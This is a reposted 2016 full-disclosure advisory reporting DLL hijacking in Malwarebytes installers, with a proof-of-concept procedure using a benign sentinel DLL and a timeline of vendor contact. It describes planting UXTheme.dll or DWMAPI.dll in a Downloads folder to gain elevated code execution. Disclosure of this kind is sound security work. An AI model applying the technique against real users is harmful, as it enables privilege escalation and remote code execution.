Home / os / winmobile

Malwarebytes 2.2.0.1024 DLL Hijacking

Posted on 08 March 2016

Hi @ll, Malwarebytes executable installers mbam-setup-2.2.0.1024.exe and mbae-setup-1.08.1.1189.exe (available from <https://downloads.malwarebytes.org/file/mbam_current/> and <https://downloads.malwarebytes.org/file/mbae_current/>) load and execute UXTheme.dll and DWMAPI.dll from their "application directory". For software downloaded with a web browser the application directory is typically the user's "Downloads" directory: see <https://insights.sei.cmu.edu/cert/2008/09/carpet-bombing-and-directory-poisoning.html>, <http://blog.acrossecurity.com/2012/02/downloads-folder-binary-planting.html> and <http://seclists.org/fulldisclosure/2012/Aug/134> If an attacker places UXTheme.dll and/or DWMAPI.dll in the user's "Downloads" directory, for example per "drive-by download" or "social engineering", this vulnerability becomes a remote code execution. Due to the application manifest embedded in the executables which specifies "requireAdministrator" the executable installers are run with administrative privileges ("protected" administrators are prompted for consent, unprivileged standard users are prompted for an administrator password); execution of the DLLs therefore results in an escalation of privilege! Proof of concept/demonstration: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1. visit <http://home.arcor.de/skanthak/sentinel.html>, download <http://home.arcor.de/skanthak/download/SENTINEL.DLL>, save it as UXTheme.dll in your "Downloads" directory, then copy it as DWMAPI.dll; 2. download mbam-setup-2.2.0.1024.exe and mbae-setup-1.08.1.1189.exe and save them in your "Downloads" directory; 3. execute mbam-setup-2.2.0.1024.exe and mbae-setup-1.08.1.1189.exe from your "Downloads" directory; 4. notice the message boxes displayed from the DLLs placed in step 1. PWNED! See <http://seclists.org/fulldisclosure/2015/Nov/101>, <http://seclists.org/fulldisclosure/2015/Dec/86> and http://seclists.org/fulldisclosure/2015/Dec/33 plus <http://home.arcor.de/skanthak/!execute.html> and <http://home.arcor.de/skanthak/sentinel.html> for details about this well-known and well-documented BEGINNER'S error! regards Stefan Kanthak PS: I really LOVE (security) software with such trivial beginner's errors. It's a tell-tale sign to stay away from this snakeoil! Timeline: ~~~~~~~~~ 2015-12-25 sent report regarding MBAM to vendor 2015-12-25 automatic reply from vendor: "We have received your request and an agent will respond to your ticket in the order in which it was received." 2016-01-03 reply from vendor: "We'll take this into consideration for a near-future installer revamp." 2016-02-02 requested status update NO REPLY, not even an acknowledgement of receipt 2016-02-02 sent notice to Marcin Kleczynski after his public announcement of a bug bounty program 2016-02-02 reply from Marcin Kleczynski: "I'm copying Pedro Bustamante who organizes our bug bounty program to take a look." NO reply from Pedro Bustamante et.al. 2016-02-12 sent report regarding MBAE to vendor NO REPLY, not even an acknowledgement of receipt 2016-02-22 resent report regarding MBAE to vendor NO REPLY, not even an acknowledgement of receipt 2016-03-06 report published in accordance with my disclosure policy <http://home.arcor.de/skanthak/policy.html>

 

TOP

Malware :